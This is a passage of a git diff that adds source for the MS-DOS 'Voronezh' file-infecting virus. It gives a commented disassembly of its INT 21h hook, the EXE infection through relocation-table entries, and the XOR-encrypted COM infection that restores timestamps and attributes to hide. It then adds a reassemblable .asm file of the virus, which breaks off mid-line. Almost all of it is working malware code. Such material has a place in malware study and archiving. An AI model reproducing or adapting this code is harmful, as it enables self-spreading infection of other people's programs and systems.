+24AB B90400 mov cx,0004
+24AE 5E pop si ; offset of extension
+24AF F3A6 rep cmpsb
+24B1 83F900 cmp cx,0000
+
+; restore callers registers
+
+24B4 07 pop es
+24B5 5F pop di
+24B6 5E pop si
+24B7 5A pop dx
+24B8 59 pop cx
+24B9 5B pop bx
+24BA 58 pop ax
+24BB 7409 je 24C6 ; exe file, contaminate it!
+
+; not EXE file, maybe COM or subfunction <> 3D00h
+
+24BD 50 push ax ; store subfunction code
+24BE FEC4 inc ah ; hide 4B00h comparison
+24C0 3D004C cmp ax,4C00 ; "terminate" proces
+24C3 58 pop ax ; restore subfunction
+24C4 7513 jne 24D9 ; jump to old INT 21h
+
+; EXE file will be open for read only or any file will be loaded and executed
+; store caller registers again
+
+24C6 50 push ax
+24C7 53 push bx
+24C8 51 push cx
+24C9 52 push dx
+24CA 56 push si
+24CB 57 push di
+24CC 06 push es
+24CD 1E push ds
+24CE E91F01 jmp 25F0 ; contaminate
+
+; jump to old INT 21h
+
+24D1 1F pop ds
+24D2 07 pop es
+24D3 5F pop di
+24D4 5E pop si
+24D5 5A pop dx
+24D6 59 pop cx
+24D7 5B pop bx
+24D8 58 pop ax
+
+24D9 9D popf
+24DA EA60147902 jmp 0279:1460 ; old INT 21h
+
+; ^^^^^^^^ old INT 21h (place holder)
+;---------------------
+; continue instalation
+
+; get INT 21h
+
+24DF 8EDA mov ds,dx ; DS points at new virus location
+24E1 B82135 mov ax,3521
+24E4 CD21 int 21
+24E6 3E891EC201 mov ds:[01C2],bx ; modify own code
+24EB 3E8C06C401 mov ds:[01C4],es
+24F0 3E891E7503 mov ds:[0375],bx
+24F5 3E8C067703 mov ds:[0377],es
+
+; set new INT 21h
+
+24FA 8D165301 lea dx,[0153] ; here 246C
+24FE B82125 mov ax,2521
+2501 CD21 int 21
+
+2503 5A pop dx ; virus base
+2504 BBB002 mov bx,02B0 ; offset of working varible
+2507 01D3 add bx,dx ; add base
+2509 2E803F00 cmp byte ptr [bx],00 ; carrier type
+250D 7441 je 2550 ; carrier is COM file
+
+; carrier is EXE file
+
+250F 1F pop ds ; restore DS
+2510 8CD8 mov ax,ds ; store new virus segment
+2512 0E push cs
+2513 1F pop ds
+2514 8BCA mov cx,dx
+2516 5F pop di ; entry point offset
+2517 07 pop es ; entry point segment
+2518 50 push ax
+2519 83EF05 sub di,0005 ; length of FAR CALL
+
+; improper handling of the case when relocation item points exactly at
+; fifth byte of stored code
+
+251C BEAF02 mov si,02AF ; extension of buffer
+251F 01CE add si,cx ; virus base
+2521 8A14 mov dl,[si] ; get sixth byte, this byte may by
+ ; changed during relocation proces
+
+; this byte should be added to sixth byte in file (counting from entry point)
+
+2523 26005505 add es:[di+05],dl ; add key
+2527 26385505 cmp es:[di+05],dl ; was DL = 0?
+252B 7703 ja 2530 ; jump if no
+
+252D 4E dec si
+252E FE04 inc byte ptr [si]
+
+2530 8BD7 mov dx,di ; destination
+2532 BEAA02 mov si,02AA ; source buffer
+2535 01CE add si,cx ; add base
+2537 B90500 mov cx,0005 ; number of bytes
+253A F3A4 rep movsb
+253C 1F pop ds
+
+253D 06 push es ; prepare long jump
+253E 52 push dx
+253F 8CD8 mov ax,ds ; reset registers
+2541 8EC0 mov es,ax
+2543 31C0 xor ax,ax
+2545 31DB xor bx,bx
+2547 31C9 xor cx,cx
+2549 31D2 xor dx,dx
+254B 31F6 xor si,si
+254D 31FF xor di,di
+254F CB retf ; jump to application
+
+; exit to COM application
+
+2550 8CC8 mov ax,cs
+2552 8ED8 mov ds,ax
+2554 8EC0 mov es,ax
+2556 BE6802 mov si,0268 ; offset of encryption routine
+2559 B90001 mov cx,0100 ; number of bytes
+255C BB8102 mov bx,0281 ; file size
+255F 8B3F mov di,[bx]
+2561 83FF00 cmp di,0000 ; ??
+2564 7502 jne 2568
+
+2566 CD20 int 20 ; terminate
+
+; form destination address
+
+2568 BB8302 mov bx,0283 ; place holder for virus length
+256B 8B07 mov ax,[bx] ; virus length
+256D 01C7 add di,ax ; add to file size
+256F 81C70001 add di,0100 ; size of PSP
+2573 FC cld
+2574 57 push di ; destination address
+2575 F3A4 rep movsb ; move part of code
+2577 5F pop di ; restore address
+2578 8B0E8302 mov cx,[0283] ; virus size
+257C A18102 mov ax,[0281] ; file length
+257F 57 push di ; prepare jump
+2580 C3 ret ; jump to moved code (here 2581)
+
+;--------------------
+; encryption routine
+
+2581 050001 add ax,0100 ; PSP size
+2584 8BF0 mov si,ax ; offset of encrypted block
+2586 BF0001 mov di,0100 ; destination
+2589 FC cld
+
+; decrypt block and copy it to begin of file
+
+258A 8A04 mov al,[si]
+258C 34BB xor al,BB
+258E 8805 mov [di],al
+2590 46 inc si
+2591 47 inc di
+2592 E2F6 loop 258A
+
+; jump to application
+
+2594 B80001 mov ax,0100 ; entry point for EXE
+2597 5B pop bx ; balance stack
+2598 50 push ax ; prepare jump
+2599 C3 ret ; jump to COM
+
+; working area
+
+259A 1926 ; [base + 0281] low word of file size
+259C 4006 ; [base + 0283] size of virus, (high word of file length)
+259E 014C ; [base + 0285] old INT 24h (offset)
+25A0 169F ; [base + 0287] old INT 24h (segment)
+
+25A2 45 58 45 ; [base + 0289] 'EXE'
+25A5 65 78 65 ; [base + 028C] 'exe'
+
+; unused
+
+; below line after xoring with 1A become: OleynikozL - name of the wirus author
+
+25A8 55 76 7F 63 74 73 71 75 60 56 ; Uvctsqu`
+
+25B1 56 6F 72 6F 6E 65 7A 68 2C ; Voronezh,
+25BA 31 39 39 30 20 32 2E 30 31 ; 1990 2.01
+
+; used data
+
+25C3 FC 0E 1F BA BB ; [base + 02AA] starting 5 bytes of EXE file
+25C8 00 ; [base + 02AF] this byte is added to 02AE
+ ; if it is 0 then [02AE] is decreased by 1
+25C9 01 ; [base + 02B0] carrier type: 0 - EXE, 1 - COM
+
+25CA 0002 ; [base + 02B1] offset in header for new relocation entry
+25CC E61E ; [base + 02B3] IP of EXE file
+25CE 0000 ; [base + 02B5] CS of EXE file
+25D0 0000
+25D2 00
+25D3 0000 ; [base + 02BA] virus entry point in file on disk
+25D5 E620 ; [base + 02BC] - [02B1]
+25D7 0000 ; [base + 02BE] segment of virus entry point
+25D9 1924 ; [base + 02C0] offset
+25DB 9A ; [base + 02C2] code of CALL SSSS:OOOO
+25DC 1924 ; [base + 02C3] OOOO
+25DE 0000 ; [base + 02C5] SSSS
+25E0 0000 ; [base + 02C7] file position low word
+25E2 1E00 ; [base + 02C9] file position high word
+25E4 0001 ; [base + 02CB] size of buffer
+25E6 0000 ; [base + 02CD] total size of readed part of ReloTabl
+25E8 00 ; [base + 02CF] number of disk (0 - default, 1 - A, ...)
+25E9 2000 ; [base + 02D0] file attributes
+25EB B438 ; [base + 02D2] offset of file name
+25ED 0F4C ; [base + 02D4] segment of file name
+
+;-----------------
+; INT 24h handler
+
+25EF CF iret
+
+; jump here if EXE file is open or sam program is loaded and executed
+
+; check file name, skip file if fourth and fifth characters in path are 'CO'
+
+25F0 8BDA mov bx,dx ; offset of path
+25F2 3E8B4703 mov ax,ds:[bx+03] ; skip 'd:\' (?)
+25F6 3D434F cmp ax,4F43 ; 'CO' protect 'C:\COMMAND.COM' ?
+25F9 7503 jne 25FE
+
+25FB E9D3FE jmp 24D1 ; jump to old INT 21h
+
+; check presence of disk specyfication
+
+25FE 8BFA mov di,dx ; offset of path
+2600 31C0 xor ax,ax
+2602 2EC606CF0200 mov byte ptr [02CF],00 ; default
+2608 3E807D013A cmp ds:byte ptr [di+01],3A ; ':' is disk specified?
+260D 7509 jne 2618 ; no
+
+; convert disk specyfication to number (A - 1, B - 2, ...)
+
+260F 3E8A05 mov al,ds:[di]
+2612 249F and al,9F ; convert
+2614 2EA2CF02 mov [02CF],al ; store disk number
+
+2618 B80043 mov ax,4300 ; get file attributes
+261B CD21 int 21
+
+; store address of path and file attributes
+
+261D 2E890ED002 mov [02D0],cx
+2622 2E8C1ED202 mov [02D2],ds
+2627 2E8916D402 mov [02D4],dx
+
+; intercepte INT 24h
+
+262C 1E push ds
+262D 52 push dx
+262E 06 push es
+
+262F 0E push cs
+2630 1F pop ds
+2631 B82435 mov ax,3524
+2634 CD21 int 21
+2636 891E8502 mov [0285],bx
+263A 8C068702 mov [0287],es
+
+263E BAD602 mov dx,02D6
+2641 B82425 mov ax,2524
+2644 CD21 int 21
+
+2646 07 pop es
+2647 5A pop dx
+2648 1F pop ds
+
+2649 1E push ds
+
+264A 0E push cs
+264B 1F pop ds
+
+264C BB0001 mov bx,0100
+264F B94007 mov cx,0740 ; offset of buffer
+2652 29D9 sub cx,bx ; virus length
+2654 BB8302 mov bx,0283 ; offset of varible
+2657 890F mov [bx],cx ; size of virus/crypted block
+
+2659 1F pop ds
+
+265A 8BDA mov bx,dx ; waste of time
+265C 1E push ds ; store address of path
+265D 52 push dx
+265E 53 push bx ; waste of time
+
+265F 0E push cs
+2660 1F pop ds
+
+2661 B436 mov ah,36 ; disk free
+2663 8A16CF02 mov dl,[02CF] ; disk number
+2667 CD21 int 21
+
+2669 3DFFFF cmp ax,FFFF ; check for error
+266C 7509 jne 2677 ; ok
+
+; disk not accessible, exit
+
+266E 58 pop ax ; balance stack
+266F 58 pop ax
+2670 58 pop ax
+2671 E8A203 call 2A16 ; restore INT 24h
+2674 E95AFE jmp 24D1 ; jump to old INT 21h
+
+; convert disk free space into bytes
+
+2677 F7E3 mul bx
+2679 F7E1 mul cx
+267B 09D2 or dx,dx
+267D 7506 jne 2685 ; plenty of free room
+
+267F 3B068302 cmp ax,[0283] ; minimum disk free space
+2683 72E9 jb 266E ; disk full, exit
+
+2685 5B pop bx ; balance stack
+2686 5A pop dx ; path address
+2687 1F pop ds
+2688 B8003D mov ax,3D00 ; open file for read only
+268B 9C pushf
+268C FA cli
+268D 9A60147902 call 0279:1460 ; old INT 21h
+
+; ^^^^^^^^ old INT 21h (place holder)
+
+2692 7306 jnb 269A ; OK
+
+2694 E87F03 call 2A16 ; restore INT 24h
+2697 E937FE jmp 24D1 ; jump to old INT 21h
+
+269A 50 push ax ; store handle
+269B 8CC8 mov ax,cs ; set DS and ES to virus segment
+269D 8ED8 mov ds,ax
+269F 8EC0 mov es,ax
+26A1 58 pop ax ; restore handle
+26A2 50 push ax ; store handle
+26A3 8BD8 mov bx,ax
+26A5 B80057 mov ax,5700 ; get file time/date stamp
+26A8 CD21 int 21
+
+26AA 58 pop ax ; restore handle
+26AB 51 push cx ; attributes
+26AC 52 push dx ; offset of path
+26AD 50 push ax ; handle
+
+; get file size
+
+26AE 8BD8 mov bx,ax ; handle
+26B0 B90000 mov cx,0000
+26B3 BA0000 mov dx,0000
+26B6 B442 mov ah,42 ; move file ptr
+26B8 B002 mov al,02 ; to EOF
+26BA CD21 int 21
+
+26BC BB8102 mov bx,0281 ; store low word of file length
+26BF 8907 mov [bx],ax
+
+; waste of time or programmers error
+
+26C1 BB8302 mov bx,0283 ; 'store' high word of file length
+26C4 8B0F mov cx,[bx] ; <- error (?), maybe: mov [bx],cx ?
+
+; move file ptr to BOF
+
+26C6 B90000 mov cx,0000
+26C9 BA0000 mov dx,0000
+26CC B80042 mov ax,4200 ; move file ptr to BOF
+26CF 5B pop bx ; restore handle
+26D0 53 push bx
+26D1 CD21 int 21
+
+; read [0283] bytes of file to buffer located above virus
+
+26D3 BB8302 mov bx,0283 ; working varible
+26D6 8B0F mov cx,[bx] ; length of virus/encrypted block
+26D8 5B pop bx ; restore handle
+26D9 53 push bx
+26DA BA4007 mov dx,0740 ; buffer
+26DD B43F mov ah,3F ; read file
+26DF CD21 int 21
+
+26E1 BE4007 mov si,0740 ; buffer
+26E4 8B0C mov cx,[si] ; first word
+26E6 81F98CD8 cmp cx,D88C ; signature in COM file
+26EA 7509 jne 26F5 ; clear COM or EXE file
+
+; this is infected COM file, exit
+
+26EC 5B pop bx ; handle
+26ED 58 pop ax ; balance stack
+26EE 58 pop ax
+26EF E81F03 call 2A11 ; close file and restore INT 24h
+26F2 E9DCFD jmp 24D1 ; jump to old INT 21h
+
+; is it EXE file or clear COM?
+
+26F5 81F94D5A cmp cx,5A4D ; EXE marker
+26F9 7403 je 26FE ; yes
+
+26FB E98902 jmp 2987 ; infect COM file
+
+; check EXE file
+
+26FE 5B pop bx ; restore handle
+26FF 53 push bx
+2700 B80042 mov ax,4200 ; move file ptr to BOF
+2703 31C9 xor cx,cx
+2705 31D2 xor dx,dx
+2707 CD21 int 21
+
+2709 B93200 mov cx,0032 ; block size
+270C B8003F mov ax,3F00 ; read file
+270F 8D164007 lea dx,[0740] ; buffer
+2713 CD21 int 21
+
+; check free place in relocation table
+
+2715 A14607 mov ax,[0746] ; ReloCnt
+2718 B90400 mov cx,0004 ; entry size
+271B F7E1 mul cx ; AX size of relocation table
+271D 8B1E5807 mov bx,[0758] ; TablOff
+2721 01D8 add ax,bx
+2723 8BD0 mov dx,ax ; size of used area in header
+2725 8BFA mov di,dx
+2727 A14807 mov ax,[0748] ; HdrSize
+272A B91000 mov cx,0010 ; convert to bytes
+272D F7E1 mul cx
+272F 8BD7 mov dx,di ; used header size
+2731 83C204 add dx,0004 ; one additional entry
+2734 39D0 cmp ax,dx ; is free space?
+2736 7703 ja 273B ; yes
+
+2738 E94902 jmp 2984 ; relocation table is full, exit
+
+; prepare new header
+
+273B A3B102 mov [02B1],ax ; offset of first unused entry
+273E A14607 mov ax,[0746] ; ReloCnt
+2741 40 inc ax ; add one entry
+2742 A34607 mov [0746],ax ; ReloCnt, store new value of counter
+2745 A15407 mov ax,[0754] ; IP
+2748 A3B302 mov [02B3],ax ; store oryginal IP
+274B A15607 mov ax,[0756] ; CS
+274E A3B502 mov [02B5],ax ; store oryginal CS
+2751 31D2 xor dx,dx
+2753 31C9 xor cx,cx
+2755 B80242 mov ax,4202 ; move file ptr to EOF
+2758 5B pop bx ; restore handle
+2759 53 push bx
+275A CD21 int 21
+
+275C 50 push ax ; store file length
+275D 52 push dx
+275E 03068302 add ax,[0283] ; find new file length
+2762 3B068302 cmp ax,[0283] ; long integer addition
+2766 7701 ja 2769
+
+2768 42 inc dx ; high word of file length
+
+2769 B90002 mov cx,0200 ; convert into 512 byte pages
+276C F7F1 div cx
+276E 83FA00 cmp dx,0000 ; last page non empty?
+2771 7401 je 2774
+
+2773 40 inc ax ; count last page
+
+; check if header information match to real file size
+
+2774 8B1E4407 mov bx,[0744] ; PageCnt
+2778 8BC8 mov cx,ax ; new PageCnt
+277A 29D9 sub cx,bx ; diference
+277C 83F905 cmp cx,0005 ; maximum possible
+277F 7205 jb 2786 ; OK, continue infection
+
+; there is some information above program in EXE file, do not infect such a
+; file, exit
+
+2781 58 pop ax
+2782 58 pop ax
+2783 E9FE01 jmp 2984
+
+; continue infection
+
+2786 A34407 mov [0744],ax ; PageCnt, store new value
+2789 5A pop dx ; restore file length
+278A 58 pop ax ; low word of file length
+278B 8B1EB102 mov bx,[02B1] ; position of free relocation entry
+278F 39D8 cmp ax,bx
+2791 7205 jb 2798
+
+; find length of file part above last entry in relocation table
+
+2793 29D8 sub ax,bx
+2795 EB04 jmp 279B
+2797 90 nop
+
+2798 29D8 sub ax,bx
+279A 4A dec dx
+
+279B 8916BE02 mov [02BE],dx ; address of virus entry point (segment)
+279F A3C002 mov [02C0],ax ; offset
+27A2 A1B102 mov ax,[02B1] ; offset in relocation table
+27A5 8B1EB302 mov bx,[02B3] ; IP
+27A9 BA0000 mov dx,0000 ; prepare long integer addition
+27AC 01D8 add ax,bx ; add long integer
+27AE 39D8 cmp ax,bx
+27B0 7701 ja 27B3
+
+27B2 42 inc dx
+
+27B3 8BF0 mov si,ax ; offset of entry point
+27B5 8BFA mov di,dx ; high word
+27B7 A1B502 mov ax,[02B5] ; CS
+27BA B91000 mov cx,0010 ; convert to bytes
+27BD F7E1 mul cx
+27BF 01D7 add di,dx ; high word
+27C1 01C6 add si,ax ; low word
+27C3 39C6 cmp si,ax
+27C5 7701 ja 27C8
+
+27C7 47 inc di
+
+; store distance in file between first free entry in relocation table and
+; program entry point in disk file
+
+27C8 8BC6 mov ax,si
+27CA 8BD7 mov dx,di
+27CC 8916BA02 mov [02BA],dx
+27D0 A3BC02 mov [02BC],ax
+
+; move file position to entry point
+
+27D3 8BCA mov cx,dx
+27D5 8BD0 mov dx,ax
+27D7 B80042 mov ax,4200 ; move file ptr
+27DA C606B00201 mov byte ptr [02B0],01 ; flag: EXE file
+27DF C606AF0200 mov byte ptr [02AF],00 ; buffer extension
+27E4 5B pop bx ; handle
+27E5 53 push bx
+27E6 CD21 int 21
+
+; read oryginal five bytes from entry point
+
+27E8 B90500 mov cx,0005 ; number of bytes
+27EB 8D16AA02 lea dx,[02AA] ; local buffer
+27EF B8003F mov ax,3F00 ; read file
+27F2 CD21 int 21
+
+27F4 803EAA029A cmp byte ptr [02AA],9A ; signature
+27F9 7503 jne 27FE ; not infected, continue
+
+27FB E98601 jmp 2984 ; do not infect, exit
+
+; continue infection
+
+27FE E82302 call 2A24 ; clear attributes and reopen for read/write
+
+; move file ptr to first not used entry in relocation table
+
+2801 8B1E5807 mov bx,[0758] ; TableOff
+2805 A14607 mov ax,[0746] ; ReloCnt
+2808 48 dec ax ; count starts from zero
+2809 B90400 mov cx,0004 ; entry size
+280C F7E1 mul cx
+280E 01C3 add bx,ax ; offset in table
+2810 B90000 mov cx,0000
+2813 8BD3 mov dx,bx
+2815 B80042 mov ax,4200 ; move file ptr to BOF
+2818 5B pop bx ; handle
+2819 53 push bx
+281A CD21 int 21
+
+; write new relocation table entry
+
+281C 8B16B302 mov dx,[02B3] ; IP
+2820 83C203 add dx,0003 ; length of instruction code and offset
+2823 8916B302 mov [02B3],dx ; pointer to segment word
+2827 8D16B302 lea dx,[02B3] ; buffer with CS:IP
+282B B90400 mov cx,0004 ; buffer size
+282E B440 mov ah,40 ; write file
+2830 5B pop bx ; handle
+2831 53 push bx
+2832 CD21 int 21
+
+; restore IP in [02B3]
+
+2834 8B16B302 mov dx,[02B3]
+2838 83EA03 sub dx,0003
+283B 8916B302 mov [02B3],dx
+
+; move file ptr to begin of file
+
+283F 31D2 xor dx,dx
+2841 31C9 xor cx,cx
+2843 B80042 mov ax,4200 ; move file ptr to BOF
+2846 5B pop bx ; handle
+2847 53 push bx
+2848 CD21 int 21
+
+; write new header to file
+
+284A 8B0E5807 mov cx,[0758] ; TableOff, number of bytes to write
+284E 8D164007 lea dx,[0740] ; offset of buffer
+2852 B440 mov ah,40 ; write file
+2854 CD21 int 21
+
+; form code for instruction of far call to virus
+
+2856 C606C2029A mov byte ptr [02C2],9A ; code for CALL ssss:oooo
+285B A1C002 mov ax,[02C0] ; offset of virus entry point in RAM
+285E A3C302 mov [02C3],ax ;
store in buffer +2861 A1BE02 mov ax,[02BE] ; segment +2864 B90010 mov cx,1000 ; ?? +2867 F7E1 mul cx +2869 A3C502 mov [02C5],ax ; new segment +286C 813EC30200F0 cmp word ptr [02C3],F000 +2872 7215 jb 2889 + +; keep offset below F000 + +2874 A1C302 mov ax,[02C3] +2877 8B16C502 mov dx,[02C5] +287B 81C20001 add dx,0100 ; adjust segment +287F 2D0010 sub ax,1000 ; decrease offset +2882 8916C502 mov [02C5],dx ; store new values +2886 A3C302 mov [02C3],ax + +; write to disk new entry point code + +2889 8B0EBA02 mov cx,[02BA] ; virus entry point on disk file +288D 8B16BC02 mov dx,[02BC] +2891 B80042 mov ax,4200 ; move file ptr +2894 5B pop bx +2895 53 push bx +2896 CD21 int 21 + +2898 B90500 mov cx,0005 ; buffer length +289B B440 mov ah,40 ; write file +289D 8D16C202 lea dx,[02C2] ; buffeer with CALL SSSS:OOOO +28A1 CD21 int 21 + +; append to file virus code + +28A3 B90000 mov cx,0000 +28A6 BA0000 mov dx,0000 +28A9 B80242 mov ax,4202 ; move file ptr to EOF +28AC 5B pop bx ; handle +28AD 53 push bx +28AE CD21 int 21 + +28B0 B440 mov ah,40 ; write file +28B2 8B0E8302 mov cx,[0283] ; virus length +28B6 BA0001 mov dx,0100 ; offset of virus code in RAM +28B9 CD21 int 21 + +; analyse relocation table + +28BB 31C9 xor cx,cx +28BD 8B165807 mov dx,[0758] ; TablOff +28C1 B80042 mov ax,4200 ; move file ptr +28C4 5B pop bx ; handle +28C5 53 push bx +28C6 CD21 int 21 + +28C8 C706CD020000 mov word ptr [02CD],0000 +28CE 8916C702 mov [02C7],dx ; store file position +28D2 A3C902 mov [02C9],ax +28D5 A14607 mov ax,[0746] ; ReloCnt +28D8 BF0000 mov di,0000 +28DB 48 dec ax ; restore oryginal value +28DC 3D0000 cmp ax,0000 +28DF 7503 jne 28E4 ; analyse relocation table + +; if oryginal relocation table was empty then exit + +28E1 E9A000 jmp 2984 ; close file, restore attr etc. 
+ +; find size of relocation table + +28E4 B90400 mov cx,0004 +28E7 F7E1 mul cx +28E9 8BF0 mov si,ax ; offset of last used entry + +; get current file position (this is the begin of relocation teble) + +28EB B90000 mov cx,0000 +28EE BA0000 mov dx,0000 +28F1 B80142 mov ax,4201 ; move file ptr rel current position +28F4 CD21 int 21 + +; read part of relocation table + +28F6 8916C702 mov [02C7],dx ; store file position +28FA A3C902 mov [02C9],ax +28FD B90001 mov cx,0100 ; number of bytes +2900 BA0000 mov dx,0000 ; buffer +2903 B8003F mov ax,3F00 ; read file +2906 CD21 int 21 + +2908 BF0000 mov di,0000 ; point at relocation table +290B A3CB02 mov [02CB],ax ; number of bytes readed +290E 0106CD02 add [02CD],ax ; total number of readed bytes + +; check relocation table entry + +2912 8B4502 mov ax,[di+02] ; get segment +2915 3B06B502 cmp ax,[02B5] ; is it CS +2919 7551 jne 296C ; check next entry + +291B 8B05 mov ax,[di] ; get offset +291D 3B06B302 cmp ax,[02B3] ; is it IP +2921 7249 jb 296C ; check next entry + +; relocatin item points at entry point or above + +2923 A1B302 mov ax,[02B3] ; IP +2926 050500 add ax,0005 ; length of far call +2929 3B05 cmp ax,[di] ; relocation item point inside call code +292B 763F jbe 296C ; no, consider next entry + +; modify relocation table and write it to file +; let relocation item point at the same code but now stored in virus +; body in local buffer + +292D A1C502 mov ax,[02C5] ; segment of virus entry point +2930 894502 mov [di+02],ax ; store in buffer +2933 8B05 mov ax,[di] ; offset +2935 8B1EB302 mov bx,[02B3] ; old IP +2939 29D8 sub ax,bx +293B 50 push ax ; store +293C B8AA02 mov ax,02AA ; offset of local buffer +293F 2D0001 sub ax,0100 ; offset in virus body +2942 8B1EC302 mov bx,[02C3] ; offset of entry point in RAM +2946 01D8 add ax,bx +2948 5B pop bx +2949 01D8 add ax,bx +294B 8905 mov [di],ax ; new offset +294D 8B0EC702 mov cx,[02C7] ; restore file position +2951 8B16C902 mov dx,[02C9] +2955 B80042 mov ax,4200 ; move file 
ptr +2958 5B pop bx ; restore handle +2959 53 push bx +295A CD21 int 21 + +295C 8B0ECB02 mov cx,[02CB] ; number of bytes +2960 B440 mov ah,40 ; write file +2962 5B pop bx ; handle +2963 53 push bx +2964 BA0000 mov dx,0000 ; from +2967 CD21 int 21 +2969 EB19 jmp 2984 ; close file, etc. exit +296B 90 nop + +296C 83C704 add di,0004 ; next entry in relocation table +296F A1CD02 mov ax,[02CD] ; number of readed bytes +2972 2D0001 sub ax,0100 ; buffer size +2975 01F8 add ax,di ; current position in table +2977 39F0 cmp ax,si ; table size +2979 7409 je 2984 ; close file, etc. exit + +297B 3B3ECB02 cmp di,[02CB] ; end of buffer? +297F 7291 jb 2912 ; no, check next relocation item + +2981 E967FF jmp 28EB ; read next part of relocation table + +2984 EB67 jmp 29ED ; close file, etc. and exit +2986 90 nop + +;------------------- +; infect COM file + +; check maximum file size + +2987 8B0E8102 mov cx,[0281] ; file size +298B 81F948EE cmp cx,EE48 ; maximum file size (61000) +298F 7209 jb 299A + +; file too long or too short, exit + +2991 5B pop bx +2992 58 pop ax +2993 58 pop ax +2994 E87A00 call 2A11 ; close file and restore INT 24h +2997 E937FB jmp 24D1 ; jump to old INT 21h + +; check minimum file size + +299A 3B0E8302 cmp cx,[0283] ; virus length, minimum file size +299E 72F1 jb 2991 ; file too short, exit + +29A0 E88100 call 2A24 ; clear attributes and reopen file +29A3 C606B00200 mov byte ptr [02B0],00 + +; get file size + +29A8 BA0000 mov dx,0000 +29AB B90000 mov cx,0000 +29AE B80242 mov ax,4202 ; move file ptr to EOF +29B1 5B pop bx ; restore handle +29B2 53 push bx +29B3 CD21 int 21 + +29B5 BE8302 mov si,0283 +29B8 8B0C mov cx,[si] ; virus size +29BA B440 mov ah,40 ; write file +29BC 51 push cx +29BD BB4007 mov bx,0740 ; offset of buffer + +; encrypt block + +29C0 8A07 mov al,[bx] +29C2 34BB xor al,BB +29C4 8807 mov [bx],al +29C6 43 inc bx +29C7 E2F7 loop 29C0 + +; write to file + +29C9 59 pop cx ; block size +29CA 5B pop bx ; handle +29CB 53 push bx +29CC BA4007 mov 
dx,0740 ; offset of buffer +29CF CD21 int 21 + +29D1 B80042 mov ax,4200 ; move file ptr to BOF +29D4 BA0000 mov dx,0000 +29D7 B90000 mov cx,0000 +29DA CD21 int 21 + +29DC BB1001 mov bx,0110 ; faked instruction + +29DF BE8302 mov si,0283 +29E2 8B0C mov cx,[si] +29E4 BA0001 mov dx,0100 +29E7 B440 mov ah,40 ; write file +29E9 5B pop bx ; handle +29EA 53 push bx +29EB CD21 int 21 + +; common (EXE and COM) exit code, restore file date/time stamp + +29ED 5B pop bx ; handle +29EE 5A pop dx ; file date stamp +29EF 59 pop cx ; file time stamp +29F0 53 push bx ; store handle +29F1 B80157 mov ax,5701 ; restore file time/date stamp +29F4 CD21 int 21 + +; restore file attributes + +29F6 8B16D402 mov dx,[02D4] ; path offset +29FA 8E1ED202 mov ds,[02D2] ; path segment +29FE B80143 mov ax,4301 ; set file attributes +2A01 2E8B0ED002 mov cx,cs:[02D0] ; restore attributes +2A06 CD21 int 21 + +2A08 0E push cs +2A09 1F pop ds +2A0A 5B pop bx ; handle +2A0B E80300 call 2A11 ; close file and restore INT 24h +2A0E E9C0FA jmp 24D1 ; jump to old INT 21h + +;------------------------------- +; close file and restore INT 24h + +2A11 B8003E mov ax,3E00 ; close file +2A14 CD21 int 21 + +;---------------- +; restore INT 24h + +2A16 8B1E8502 mov bx,[0285] +2A1A 8E068702 mov es,[0287] +2A1E B82425 mov ax,2524 ; restore INT 24h +2A21 CD21 int 21 +2A23 C3 ret + +;------------------------------------------------ +; clear file attributes and reopen for read/write + +2A24 55 push bp +2A25 8BEC mov bp,sp +2A27 1E push ds +2A28 B80143 mov ax,4301 ; set file attributes +2A2B 8B16D402 mov dx,[02D4] ; path offset +2A2F 8E1ED202 mov ds,[02D2] ; path segment +2A33 31C9 xor cx,cx ; clear all +2A35 CD21 int 21 + +2A37 7306 jnb 2A3F ; continue + +; exit to old INT 21h + +2A39 1F pop ds +2A3A 5D pop bp +2A3B 58 pop ax +2A3C E945FF jmp 2984 ; exit + +2A3F 368B5E04 mov bx,ss:[bp+04] ; restore handle +2A43 B8003E mov ax,3E00 ; close file +2A46 CD21 int 21 + +2A48 B8023D mov ax,3D02 ; open file for read/write +2A4B FA 
cli
+2A4C 9C pushf
+2A4D 2EFF1EC201 call far [01C2] ; old INT 21h
+2A52 1F pop ds
+
+2A53 36894604 mov ss:[bp+04],ax ; handle
+2A57 5D pop bp
+2A58 C3 ret
+
+; end of file
+;----------------------------------------
+; buffer for header of infected EXE file
+
+cs:0740 ; 'MZ'
+cs:0742 ; PartPag
+cs:0744 ; PageCnt
+cs:0746 ; ReloCnt
+cs:0748 ; HdrSize
+cs:074a ; MinMem
+cs:074c ; MaxMem
+cs:074e ; ReloSS
+cs:0750 ; ExeSP
+cs:0752 ; ChkSum
+cs:0754 ; ExeIP
+cs:0756 ; ReloCS
+cs:0758 ; TablOff
+cs:075a ; Overlay
+
+
diff --git a/MSDOS/Virus.MSDOS.Unknown.voronezh.asm b/MSDOS/Virus.MSDOS.Unknown.voronezh.asm
new file mode 100644
index 00000000..d71c8577
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.voronezh.asm
@@ -0,0 +1,880 @@ + +PAGE 59,132 + +; +; +; VORONEZH +; +; Created: 2-Mar-91 +; Passes: 5 Analysis Options on: AJW +; +; + +data_1e equ 1C2h +data_5e equ 3 +data_6e equ 0 +data_7e equ 2 +data_46e equ 100h + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +voronezh proc far + +start: + mov ax,ds + push cs + pop ds + push ax + call sub_1 + +voronezh endp + +; +; SUBROUTINE +; + +sub_1 proc near + pop bx + sub bx,108h + push bx + mov ah,0ABh + int 21h ; ??INT Non-standard interrupt + cmp ax,5555h + jne loc_1 ; Jump if not equal + jmp loc_10 +loc_1: + mov ax,es + sub ax,1 + mov ds,ax + mov bx,data_5e + mov ax,ds:[bx] + sub ax,0EAh + mov ds:[bx],ax + push es + pop ds + mov bx,data_7e + mov ax,ds:[bx] + sub ax,0EAh + mov ds:[bx],ax + mov es,ax + mov di,data_46e + mov si,100h + pop bx + push bx + add si,bx + push cs + pop ds + mov cx,6A4h + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov dx,ax + jmp short loc_9 + nop + pushf ; Push flags + sti ; Enable interrupts + cmp ah,0ABh + jne loc_2 ; Jump if not equal + mov ax,5555h + popf ; Pop flags + iret ; Interrupt return +loc_2: + cmp ax,3D00h + jne loc_5 ; Jump if not equal + push ax + push bx + push cx + push dx + push si + push di + push es + mov cx,41h + xor al,al ; Zero register + mov di,dx + push ds + pop es + repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al + sub di,4 + mov si,di + push si + push cs + pop es + mov cx,4 + mov di,289h + repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di] + cmp cx,0 + jne loc_3 ; Jump if not 